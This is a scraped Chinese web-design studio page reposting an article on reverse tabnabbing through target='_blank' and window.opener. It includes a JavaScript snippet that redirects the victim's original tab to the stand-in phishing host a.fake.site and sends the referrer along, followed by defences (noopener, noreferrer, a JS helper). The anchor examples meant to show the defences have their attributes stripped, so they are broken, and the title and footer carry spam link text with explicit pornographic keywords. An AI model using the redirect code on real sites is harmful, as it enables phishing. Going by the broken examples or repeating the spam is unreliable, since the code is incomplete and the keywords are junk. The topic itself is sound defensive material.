中文字幕久久一區二區,97国产精品成人无码视频

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案

你不曾察覺的隱患：危險(xiǎn)的target="_blank"與“opener”

在網(wǎng)頁中使用鏈接時(shí)，如果想要讓瀏覽器自動(dòng)在新的標(biāo)簽頁打開指定的地址，通常的做法就是在 a 標(biāo)簽上添加 target等于"_blank" 屬性。

創(chuàng)新互聯(lián)主營(yíng)環(huán)江網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,主營(yíng)網(wǎng)站建設(shè)方案,成都app軟件開發(fā),環(huán)江h(huán)5重慶小程序開發(fā)搭建,環(huán)江網(wǎng)站營(yíng)銷推廣歡迎環(huán)江等地區(qū)企業(yè)咨詢

然而，就是這個(gè)屬性，為釣魚攻擊者帶來了可乘之機(jī)。

起源

parent 與 opener

在說 opener 之前，可以先聊聊中的 parent。<br /></p><p>我們知道，在 <iframe> 中提供了一個(gè)用于父子頁面交互的對(duì)象，叫做 window.parent，我們可以通過 window.parent 對(duì)象來從框架中的頁面訪問父級(jí)頁面的 window。<br /></p><p>opener 與 parent 一樣，只不過是用于 <a target="_blank"> 在新標(biāo)簽頁打開的頁面的。通過 <a target="_blank"> 打開的頁面，可以直接使用 window.opener 來訪問來源頁面的 window 對(duì)象。<br /></p> <h3>同域與跨域</h3> <p>瀏覽器提供了完整的跨域保護(hù)，在域名相同時(shí)，parent 對(duì)象和 opener 對(duì)象實(shí)際上就直接是上一級(jí)的 window 對(duì)象；而當(dāng)域名不同時(shí)，parent 和 opener 則是經(jīng)過包裝的一個(gè) global 對(duì)象。這個(gè) global 對(duì)象僅提供非常有限的屬性訪問，并且在這僅有的幾個(gè)屬性中，大部分也都是不允許訪問的（訪問會(huì)直接拋出 DOMException）。<br /></p><p><br /></p><p><br /></p><p>在 <iframe> 中，提供了一個(gè) sandbox 屬性用于控制框架中的頁面的權(quán)限，因此即使是同域，也可以控制 <iframe> 的安全性。<br /></p> <h3>利用</h3> <p>如果，你的網(wǎng)站上有一個(gè)鏈接，使用了 target="_blank"，那么一旦用戶點(diǎn)擊這個(gè)鏈接并進(jìn)入一個(gè)新的標(biāo)簽，新標(biāo)簽中的頁面如果存在惡意代碼，就可以將你的網(wǎng)站直接導(dǎo)航到一個(gè)虛假網(wǎng)站。此時(shí)，如果用戶回到你的標(biāo)簽頁，看到的就是被替換過的頁面了。<br /></p> <h3>詳細(xì)步驟</h3> <p>1.在你的網(wǎng)站 https://cdxwcx.com 上存在一個(gè)鏈接：</p><pre> <ol> <li><a >進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></li> </ol></pre><p>2.用戶點(diǎn)擊了這個(gè)鏈接，在新的標(biāo)簽頁打開了這個(gè)網(wǎng)站。這個(gè)網(wǎng)站可以通過 HTTP Header 中的 Referer 屬性來判斷用戶的來源。<br /></p><p>并且，這個(gè)網(wǎng)站上包含著類似于這樣的 JavaScript 代碼：</p><pre> <ol> <li>const url = encodeURIComponent('{{header.referer}}');</li> <li>window.opener.location.replace('https://a.fake.site/?' + url); </li> </ol></pre><p>3.此時(shí)，用戶在繼續(xù)瀏覽這個(gè)新的標(biāo)簽頁，而原來的網(wǎng)站所在的標(biāo)簽頁此時(shí)已經(jīng)被導(dǎo)航到了 https://a.fake.site/?https%3A%2F%2Fcdxwcx.com%2F。</p><p>4.惡意網(wǎng)站 https://a.fake.site 根據(jù) Query String 來偽造一個(gè)足以欺騙用戶的頁面，并展示出來（期間還可以做一次跳轉(zhuǎn)，使得瀏覽器的地址欄更具有迷惑性）。</p><p>5.用戶關(guān)閉 https://an.evil.site 的標(biāo)簽頁，回到原來的網(wǎng)站………………已經(jīng)回不去了。</p><p>上面的攻擊步驟是在跨域的情況下的，在跨域情況下，opener 對(duì)象和 parent 一樣，是受到限制的，僅提供非常有限的屬性訪問，并且在這僅有的幾個(gè)屬性中，大部分也都是不允許訪問的（訪問會(huì)直接拋出 DOMException）。</p><p>但是與 parent 不同的是，在跨域的情況下，opener 仍然可以調(diào)用 location.replace 方法而 parent 則不可以。<br /></p><p>如果是在同域的情況下（比如一個(gè)網(wǎng)站上的某一個(gè)頁面被植入了惡意代碼），則情況要比上面嚴(yán)重得多。<br /></p> <h3>防御</h3> <p><iframe> 中有 sandbox 屬性，而鏈接，則可以使用下面的辦法：<br /></p><p>1. Referrer Policy 和 noreferrer</p><p>上面的攻擊步驟中，用到了 HTTP Header 中的 Referer 屬性，實(shí)際上可以在 HTTP 的響應(yīng)頭中增加 Referrer Policy 頭來保證來源隱私安全。<br /></p><p>Referrer Policy 需要修改后端代碼來實(shí)現(xiàn)，而在前端，也可以使用 <a> 標(biāo)簽的 rel 屬性來指定 rel="noreferrer" 來保證來源隱私安全。</p><pre> <ol> <li><a >進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></li> </ol></pre><p>但是要注意的是：即使限制了 referer 的傳遞，仍然不能阻止原標(biāo)簽被惡意跳轉(zhuǎn)。</p><p>2. noopener</p><p>為了安全，現(xiàn)代瀏覽器都支持在 <a> 標(biāo)簽的 rel 屬性中指定 rel="noopener"，這樣，在打開的新標(biāo)簽頁中，將無法再使用 opener 對(duì)象了，它為設(shè)置為了 null。</p><pre> <ol> <li><a >進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></li> </ol></pre><p>3. JavaScript</p><p>noopener 屬性看似是解決了所有問題，但是...瀏覽器的兼容性問題...<br /></p><p><br /></p><p>可以看到，現(xiàn)在絕大多數(shù)瀏覽器都已經(jīng)兼容了 rel="noopener" 屬性了。但是，為了保護(hù)稍舊的“近代”瀏覽器或是很舊的“古代”瀏覽器甚至是“遠(yuǎn)古”瀏覽器，只有 noopener 屬性還是遠(yuǎn)遠(yuǎn)不夠的。<br /></p><p>這時(shí)，就只能請(qǐng)出下面這段原生 JavaScript 來幫忙了。</p><pre> <ol> <li>"use strict"; </li> <li>function openUrl(url) { </li> <li>  var newTab = window.open(); </li> <li>  newTab.opener = null; </li> <li>  newTab.location = url; </li> <li>} </li> </ol></pre><h3>推薦</h3> <p>首先，在網(wǎng)站中的鏈接上，如果使用了 target="_blank"，就要帶上 rel="noopener"，并且建議帶上 rel="noreferrer"。類似于這樣：</p><pre> <ol> <li><a >進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></li> </ol></pre><p>當(dāng)然，在跳轉(zhuǎn)到第三方網(wǎng)站的時(shí)候，為了 SEO 權(quán)重，還建議帶上 rel="nofollow"，所以最終類似于這樣：</p><pre> <ol> <li><a >進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></li> </ol></pre><h3>性能</h3> <p>最后，再來說說性能問題。<br /></p><p>如果網(wǎng)站使用了 <a target="_blank">，那么新打開的標(biāo)簽頁的性能將會(huì)影響到當(dāng)前頁面。此時(shí)如果新打開的頁面中執(zhí)行了一個(gè)非常龐大的 JavaScript 腳本，那么原始標(biāo)簽頁也會(huì)受到影響，會(huì)出現(xiàn)卡頓的現(xiàn)象（當(dāng)然不至于卡死）。<br /></p><p>而如果在鏈接中加入了 noopener，則此時(shí)兩個(gè)標(biāo)簽頁將會(huì)互不干擾，使得原頁面的性能不會(huì)受到新頁面的影響。</p> <br> 新聞標(biāo)題：你不曾察覺的隱患：危險(xiǎn)的target="_blank"與“opener” <br> 文章位置：<a href="http://www.dlmjj.cn/article/djjgjhe.html">http://www.dlmjj.cn/article/djjgjhe.html</a> </div> <div id="8o97jpw" class="hot_new"> <div id="nhydk1h" class="page_title clearfix"> <h3>其他資訊</h3> </div> <div id="22kqkqx" class="news_list clearfix"> <ul> <li> <a href="/article/cdcsdie.html">Redis從入門到深入解析其原理（redis深入淺出原理）</a> </li><li> <a href="/article/cdcscds.html">api在線測(cè)試接口_在線測(cè)試</a> </li><li> <a href="/article/cdcsccc.html">為什么Java字符串是不可變對(duì)象？</a> </li><li> <a href="/article/cdcscsi.html">在葡萄牙，老板不能再在下班后給員工發(fā)短信</a> </li><li> <a href="/article/cdcscoi.html">格式打不開下載什么軟件好</a> </li> </ul> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div>  <div id="sywdonm" class="footer wow fadeInUp"> <div id="yjqexew" class="rowFluid"> <div id="8owusix" class="span12"> <div id="3gf4sxe" class="container"> <div id="mecaxvk" class="footer_content"> <div id="tliomdb" class="span4 col-xm-12"> <div id="mo28nwd" class="footer_list"> <div id="g28kiwv" class="span6"> <div id="jsp1zyp" class="bottom_logo"><img src="/Public/Home/images/ewm.jpg" alt="微信服務(wù)號(hào)二維碼" /></div> </div> <div id="vp8yvca" class="span6 col-xm-12"> <div id="p9spn8s" class="quick_navigation"> <div id="t7eltzg" class="quick_navigation_title">快速導(dǎo)航</div> <ul> <li><a title="成都商業(yè)雕塑" target="_blank">成都商業(yè)雕塑</a></li><li><a title="雅安服務(wù)器托管" target="_blank">雅安服務(wù)器托管</a></li><li><a title="做網(wǎng)站公司" target="_blank">做網(wǎng)站公司</a></li><li><a title="江油網(wǎng)站建設(shè)" target="_blank">江油網(wǎng)站建設(shè)</a></li><li><a title="成都企業(yè)郵箱公司" target="_blank">成都企業(yè)郵箱公司</a></li><li><a title="營(yíng)銷型網(wǎng)站建設(shè)" target="_blank">營(yíng)銷型網(wǎng)站建設(shè)</a></li><li><a title="成都電梯廣告設(shè)計(jì)" target="_blank">成都電梯廣告設(shè)計(jì)</a></li> </ul> </div> </div> </div> </div> <div id="clbybhn" class="span4 col-xm-6 col-xs-12"> <div id="r922n9t" class="footer_list"> <div id="7fcaom2" class="footer_link"> <div id="athfeci" class="footer_link_title">友情鏈接</div> <ul id="frientLinks"> <a title="網(wǎng)站制作" target="_blank">網(wǎng)站制作</a> <a title="網(wǎng)站建設(shè)" target="_blank">網(wǎng)站建設(shè)</a> <a title="成都網(wǎng)絡(luò)推廣" target="_blank">網(wǎng)絡(luò)推廣</a> <a title="成都網(wǎng)站推廣" target="_blank">網(wǎng)站推廣</a> <a title="成都微信小程序開發(fā)" target="_blank">小程序開發(fā)</a> <a title="創(chuàng)新互聯(lián)網(wǎng)站欄目導(dǎo)航" target="_blank">網(wǎng)站導(dǎo)航</a> </ul> <div id="cmu99gx" class="footer_link_title">網(wǎng)站建設(shè)</div> <ul id="frientLinks"> <li><a href="/">四川平武建站</a></li> <li><a title="創(chuàng)新互聯(lián)網(wǎng)站欄目導(dǎo)航" target="_blank">網(wǎng)站導(dǎo)航</a></li> </ul> </div> </div> </div> <div id="wpwcyub" class="span4 col-xm-6 col-xs-12"> <div id="ys9p414" class="footer_list"> <div id="oyxlkhp" class="footer_cotact"> <div id="oxushex" class="footer_cotact_title">聯(lián)系方式</div> <ul> <li><span id="rk9zg3g" class="footer_cotact_type">企業(yè)：</span><span id="7nljovk" class="footer_cotact_content">四川綿陽平武網(wǎng)站建設(shè)工作室</span></li> <li><span id="bu4roxm" class="footer_cotact_type">地址：</span><span id="9dcqnk2" class="footer_cotact_content">成都市青羊區(qū)太升南路288號(hào)</span></li> <li><span id="mefcahg" class="footer_cotact_type">電話：</span><span id="eonurqy" class="footer_cotact_content"><a href="tel:18980820575" class="call">18980820575</a></span></li> <li><span id="tcjyq6a" class="footer_cotact_type">網(wǎng)址：</span><span id="fomrzym" class="footer_cotact_content"><a href="/" title="四川平武網(wǎng)站建設(shè)">www.dlmjj.cn</a></span></li> </ul> </div> </div> </div> </div> </div> <div id="alkanex" class="copyright"> <p>公司名稱：四川綿陽平武網(wǎng)站建設(shè)工作室聯(lián)系電話：18980820575</p> <p><a target="_blank" rel="nofollow">網(wǎng)站備案號(hào)：蜀ICP備2024061352號(hào)-3</a></p> <p>四川平武建站四川平武網(wǎng)站建設(shè) 四川平武網(wǎng)站設(shè)計(jì) 四川平武網(wǎng)站制作 <a target="_blank">成都做網(wǎng)站</a></p> </div> </div> </div> </div> <footer> <div class="friendship-link"> <p>感谢您访问我们的网站，您可能还对以下资源感兴趣：</p> <a href="http://www.dlmjj.cn/" title="日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区">日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区</a> <div class="friend-links"> <a href="http://www.mozom.cn">玖玖资源综合视频|不卡免费视频在线|日本一二区观看在线|在线视频 日韩 欧美|日韩人妻无码精品色|五月天丁香成人图片|久久精品亚洲天堂人妻无码精品网站|熟女一区二区三区免费|精品国产一级无码AV|啪啪啪网站免费观看</a> <a href="http://www.sdshangyuan.cn">女女百合片www免费观看有剧情自慰|久草国产porn|色噜噜狠狠狠狠色综合久一麻豆|偷拍 自拍 三区|无码国产精品一区二区vr老人|不卡日韩无码高清|久久这里有亚洲无码|日本欧美久久久久免费视频|浮力影院成人A片|欧洲无码视频在线观看奶头</a> <a href="http://www.hamihami.cn">精品日韩乱码久久久久久丨区2区|伊人久久夜夜爽一区无码|天堂AV无码AV|国产巨乳美女裸体网站|国产熟女三区四区|综合久久久久久久|熟女色色一区二区三区|欧美成人精品一区二区三区四凶|成人区人妻精品一|国产九幺久久久官网</a> </div> </div> </footer> <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script> </body><div id="23qv9" class="pl_css_ganrao" style="display: none;"><strike id="23qv9"><fieldset id="23qv9"><tr id="23qv9"></tr></fieldset></strike><progress id="23qv9"><i id="23qv9"><tbody id="23qv9"></tbody></i></progress><pre id="23qv9"></pre><strike id="23qv9"></strike><form id="23qv9"><pre id="23qv9"><label id="23qv9"></label></pre></form><blockquote id="23qv9"><div id="23qv9"><menu id="23qv9"></menu></div></blockquote><sup id="23qv9"></sup><ol id="23qv9"></ol><tbody id="23qv9"><dl id="23qv9"><tbody id="23qv9"></tbody></dl></tbody><object id="23qv9"></object><style id="23qv9"></style><legend id="23qv9"><nav id="23qv9"><abbr id="23qv9"></abbr></nav></legend><tr id="23qv9"></tr><listing id="23qv9"></listing><ol id="23qv9"></ol><span id="23qv9"></span><pre id="23qv9"></pre><p id="23qv9"></p><cite id="23qv9"><abbr id="23qv9"><sub id="23qv9"></sub></abbr></cite><div id="23qv9"></div><div id="23qv9"><menu id="23qv9"><tr id="23qv9"></tr></menu></div><track id="23qv9"><pre id="23qv9"><style id="23qv9"></style></pre></track><progress id="23qv9"></progress><center id="23qv9"><strike id="23qv9"><table id="23qv9"></table></strike></center><tbody id="23qv9"></tbody><abbr id="23qv9"></abbr><tr id="23qv9"></tr><address id="23qv9"><cite id="23qv9"><u id="23qv9"></u></cite></address><sub id="23qv9"></sub><option id="23qv9"></option><label id="23qv9"></label><pre id="23qv9"><p id="23qv9"><dfn id="23qv9"></dfn></p></pre><label id="23qv9"></label><code id="23qv9"></code><th id="23qv9"></th><p id="23qv9"></p><tbody id="23qv9"><blockquote id="23qv9"><ol id="23qv9"></ol></blockquote></tbody><s id="23qv9"><th id="23qv9"><tbody id="23qv9"></tbody></th></s><ol id="23qv9"></ol><dfn id="23qv9"></dfn><strong id="23qv9"></strong><abbr id="23qv9"><strike id="23qv9"><menu id="23qv9"></menu></strike></abbr><th id="23qv9"></th><dd id="23qv9"><label id="23qv9"><u id="23qv9"></u></label></dd><pre id="23qv9"></pre><i id="23qv9"></i><style id="23qv9"></style><tr id="23qv9"><style id="23qv9"><th id="23qv9"></th></style></tr><pre id="23qv9"></pre><center id="23qv9"><strong id="23qv9"><form id="23qv9"></form></strong></center></div> </html>